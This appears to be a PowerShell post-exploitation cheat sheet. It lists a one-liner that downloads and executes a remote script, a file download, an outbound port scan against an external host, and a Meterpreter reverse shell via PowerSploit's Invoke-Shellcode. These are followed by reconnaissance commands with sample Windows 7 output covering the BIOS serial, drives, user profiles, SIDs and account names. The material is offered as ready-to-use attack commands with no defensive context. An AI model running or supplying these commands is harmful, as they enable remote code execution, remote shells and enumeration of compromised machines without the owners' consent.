Download and Execute Remote Powershell Script
iex (New-Object Net.WebClient).DownloadString("http://host/file.txt")
Download and Save File
(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe')
Enumerate Allowed Outbound Ports 1-1024
$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream();
$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}}
Reverse Shell Using PowerSploit's Invoke-Shellcode
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force
- Command with arguments:
gwmi win32_bios - Description: Retrieves BIOS information including system serial number.
- Output:
-
**Windows 7:** Show/Hide
PS C:\Users\johndoe> gwmi win32_bios
SMBIOSBIOSVersion : 6.00
Manufacturer : Phoenix Technologies LTD
Name : PhoenixBIOS 4.0 Release 6.0
SerialNumber : VMware-56 4d 9b 0f 26 ba 8c f9-6e 7a 1e 33 5d 3c f0 dc
Version : INTEL - 6040000
-
- Command with arguments:
[System.IO.DriveInfo]::GetDrives() - Output:
-
**Windows 7:** Show/Hide
PS C:\Users\johndoe> [System.IO.DriveInfo]::GetDrives()
Name : C:\
DriveType : Fixed
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 55568087552
TotalFreeSpace : 55568087552
TotalSize : 159876850304
RootDirectory : C:\
VolumeLabel :
Name : D:\
DriveType : CDRom
DriveFormat :
IsReady : False
AvailableFreeSpace :
TotalFreeSpace :
TotalSize :
RootDirectory : D:\
VolumeLabel :
Name : G:\
DriveType : Removable
DriveFormat :
IsReady : False
AvailableFreeSpace :
TotalFreeSpace :
TotalSize :
RootDirectory : G:\
VolumeLabel :
Name : V:\
DriveType : Network
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 259182640616
TotalFreeSpace : 259182640616
TotalSize : 827361812256
RootDirectory : V:\
VolumeLabel : TestMappedDrive
-
- Command with arguments:
gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto - Description: Retrieves information about system users.
- Output:
-
**Windows 7:** Show/Hide
PS C:\Users\johndoe> gwmi win32\_userprofile | select -unique @{name="Name";expression={$\_.\_\_server}},@{name="SID";expressi
on={$\_.sid}},@{name="LastUseTime";expression={$\_.converttodatetime($\_.lastusetime)}},localpath | ft -auto
Name SID LastUseTime localpath
---- --- ----------- ---------
WIN-244VDGE5OGH S-1-5-21-1319606305-3131390644-2280705280-1000 4/13/2012 7:52:02 PM C:\Users\johndoe
WIN-244VDGE5OGH S-1-5-20 C:\Windows\ServiceProfiles\Netwo...
WIN-244VDGE5OGH S-1-5-19 C:\Windows\ServiceProfiles\Local...
WIN-244VDGE5OGH S-1-5-18 C:\Windows\system32\config\syste...
-
- Command with arguments:
((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value - Output:
-
**Windows 7:** Show/Hide
PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
1000")).translate([System.Security.Principal.NTAccount])).value
WIN-244VDGE5OGH\johndoe
-